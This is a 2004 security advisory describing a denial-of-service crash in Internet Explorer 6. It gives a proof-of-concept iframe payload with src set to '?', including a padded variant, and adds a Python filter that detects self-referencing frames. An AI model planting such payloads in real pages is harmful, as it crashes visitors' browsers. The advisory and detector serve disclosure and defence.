Formal Report

#########################################
Application:  Internet Explorer
Vendors:      http://www.microsoft.com
Version:      6.0.2800
Platforms:    Windows
Bug:          Crash(D.O.S)
Risk:         Low
Exploitation: Local with browser
Date:         7 Apr 2004
Author:       Emmanouel Kellinis
e-mail:       me@cipher(dot)org(dot)uk
web:          http://www.cipher.org.uk
List:         BugTraq(SecurityFocus)
#########################################

=======
Product
=======

A popular Web browser, created by Microsoft, used to view pages on the World Wide Web.

===
Bug
===

The IFRAME element (tag) creates an inline frame that contains another document.
If you use the character '?' as the document, Internet Explorer starts an
infinite loop of IFrames inside IFrames, which crashes IE.

=====================
Proof Of Concept Code
=====================

Create a web page and add an IFRAME which points to --> ?

Example:

< iframe src= " ? " >

This completely crashes IE 6 in about 20 secs, consumes more than 24 MB of RAM
and uses 99% of the CPU power.

Additionally, memory consumption and crashing time can vary, depending on
how many characters you add after the '?' character.

< iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA " >

Emmanouel Kellinis
http://www.cipher.org.uk

=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================
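
A content-filter check for the condition reported above, as an added example that is not part of the original advisory: a relative reference beginning with '?' resolves to the URL of the page that contains it, so each frame loads its own parent again. The function names, the sample page and the intranet.example URL are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page and URL (assumptions, not taken from the advisory).
SAMPLE_URL = "http://intranet.example/reports/index.html"
SAMPLE_HTML = """<html><body>
<iframe src=" ? "></iframe>
<iframe src="?AAAA"></iframe>
<iframe src="/reports/other.html"></iframe>
<iframe src="http://other.example/reports/index.html"></iframe>
</body></html>"""


class FrameCollector(HTMLParser):
    """Collects the raw src value of every <iframe>/<frame> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            src = dict(attrs).get("src")
            if src is not None:
                self.sources.append(src)


def document_key(url):
    """Document identity for this check: scheme, host and path only."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower(), parts.path or "/")


def self_framing_sources(page_url, html):
    """Return the frame src values that resolve back to page_url itself."""
    # Heuristic: query and fragment are ignored, so a page that serves
    # different content per query string is reported as well.
    collector = FrameCollector()
    collector.feed(html)
    collector.close()
    page_key = document_key(page_url)
    hits = []
    for raw in collector.sources:
        src = raw.strip()  # whitespace around a URL attribute is ignored
        # An empty src means about:blank in the HTML Standard, so skip it.
        if src and document_key(urljoin(page_url, src)) == page_key:
            hits.append(raw)
    return hits
```

A gateway or crawler can call self_framing_sources() with the fetched URL and body and quarantine or log pages for which the returned list is not empty.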